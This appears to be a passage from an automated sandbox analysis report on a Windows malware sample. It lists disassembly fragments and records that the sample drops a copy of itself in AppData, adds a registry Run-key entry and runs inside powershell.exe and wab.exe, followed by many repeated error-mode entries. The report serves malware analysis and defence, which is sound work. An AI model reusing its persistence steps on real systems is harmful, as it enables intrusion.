              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04911288 push esp; retn 0000h 1_2_049112F1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_049112E8 push esp; retn 0000h 1_2_049112F1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0745A581 push 8B05A924h; iretd 1_2_0745A586
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_074503E0 pushad ; ret 1_2_074503F9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_07458E9C pushad ; ret 1_2_07458EB1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB0C38 push edx; iretd 1_2_08CB0C45
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB31FD push ebp; iretd 1_2_08CB3204
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB4992 pushad ; ret 1_2_08CB49B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB1931 pushfd ; ret 1_2_08CB1932
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB0A7C push ds; ret 1_2_08CB0A7E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB4276 push cs; retf 1_2_08CB4288
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB43AB push cs; retf 1_2_08CB43B5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB33B1 push esp; ret 1_2_08CB33CF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB43B7 push ds; retf 1_2_08CB43BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB3372 push esi; ret 1_2_08CB3373
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB2B2B push ecx; ret 1_2_08CB2B2C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_08CB3320 push ds; ret 1_2_08CB3322
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E631FD push ebp; iretd 7_2_03E63204
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E643AB push cs; retf 7_2_03E643B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E643B7 push ds; retf 7_2_03E643BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E633B1 push esp; ret 7_2_03E633CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E64992 pushad ; ret 7_2_03E649B1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E63372 push esi; ret 7_2_03E63373
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E63320 push ds; ret 7_2_03E63322
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E62B2B push ecx; ret 7_2_03E62B2C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E61931 pushfd ; ret 7_2_03E61932
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E64276 push cs; retf 7_2_03E64288
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E60A7C push ds; ret 7_2_03E60A7E
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_03E60C38 push edx; iretd 7_2_03E60C45

              Persistence and Installation Behavior

              Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: reg.exe
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | File created: \586 r1 m-line - georgia 03.05.2024.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created (dropped file): C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe
              Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Unthematic
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (92 identical entries)
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX (24 identical entries)
              Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical entries)
              Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (45 identical entries)
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
